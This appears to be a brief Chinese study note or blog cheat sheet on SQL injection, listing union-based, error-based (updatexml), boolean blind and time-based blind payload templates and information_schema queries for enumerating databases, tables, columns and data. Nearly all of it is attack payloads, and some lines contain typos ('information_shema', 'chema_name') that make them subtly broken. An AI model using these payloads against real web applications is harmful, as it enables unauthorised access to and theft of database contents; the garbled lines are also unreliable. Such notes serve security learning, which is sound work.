day1
联合注入:
order by 判断字段数;
select xxx from xxx where xxx union select 1,2,…(字段数);
报错注入:
select updatexml(1,(concat(0x7e,(命令),0x7e)),1);
盲注:
Bool:username=‘admin’ and ascii (substr((xxx (chema_name)from xxx),1,1))=n;
时间:if(ascii (substr((xxx (chema_name)from xxx),1,1))=n,sleep(5));
查询数据步骤:
1.先查数据库
select group_concat(schema_name) from information_schema.schemata;
2.查数据库中的表
select group_concat(table_name) from information_shema.tables where table_shema=‘数据库名’ ;
3.查询数据库中的列
select group_concat(column_name) from information_schema.columns where table_schema=‘数据库名’ and table_name=‘表名’;
4.查询数据
select 列名 from 库名.表名;
截取 substr( xxx,1,n);
只显示一条limit(xxx,1,1);
7307
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
